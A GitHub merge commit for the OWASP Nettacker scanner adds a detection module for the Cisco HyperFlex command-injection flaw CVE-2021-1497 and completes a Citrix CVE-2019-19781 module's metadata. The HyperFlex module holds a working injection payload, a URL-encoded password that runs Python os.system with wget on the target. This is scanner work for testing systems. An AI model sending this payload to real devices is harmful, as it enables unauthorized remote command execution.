Merge pull request #471 from OWASP/CVE-2021-1497

add new module cisco CVE 2021 1497
OWASP · Oct 2, 2021 · c7f3362 · c7f3362
2 parents be49f67 + eb3f19b
commit c7f3362
Show file tree

Hide file tree

Showing 2 changed files with 60 additions and 2 deletions.
diff --git a/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml b/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml
@@ -0,0 +1,57 @@
+info:
+  name: cisco_hyperflex_cve_2021_1497_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1497
+    - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+    - cve
+    - hyperflex
+    - cisco
+
+payloads:
+  - library: http
+    verify: false
+    timeout: 10
+    cert: ""
+    stream: false
+    proxies: ""
+    steps:
+      - method: post
+        headers:
+          Accept: "*/*"
+          Content-Type: application/x-www-form-urlencoded
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:
+                - 'auth/change'
+                - 'auth'
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        data: username=root&password=123%5C%22%2C%5C%22%246%24%24%5C%22%29%29%3Bimport%20os%3Bos.system%28%5C%22wget%20http%3A%2F%2F%7B%7B{target}%7D%7D%5C%22%29%3Bprint%28crypt.crypt%28%5C%22
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "http"
+              reverse: false
diff --git a/modules/vuln/citrix_cve_2019_19781.yaml b/modules/vuln/citrix_cve_2019_19781.yaml
@@ -2,8 +2,9 @@ info:
   name: citrix_cve_2019_19781_vuln
   author: OWASP Nettacker Team
   severity: 8
-  description:
-  reference:
+  description: CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance
+  reference: 
+    - https://support.citrix.com/article/CTX267027
   profiles:
     - vuln
     - vulnerability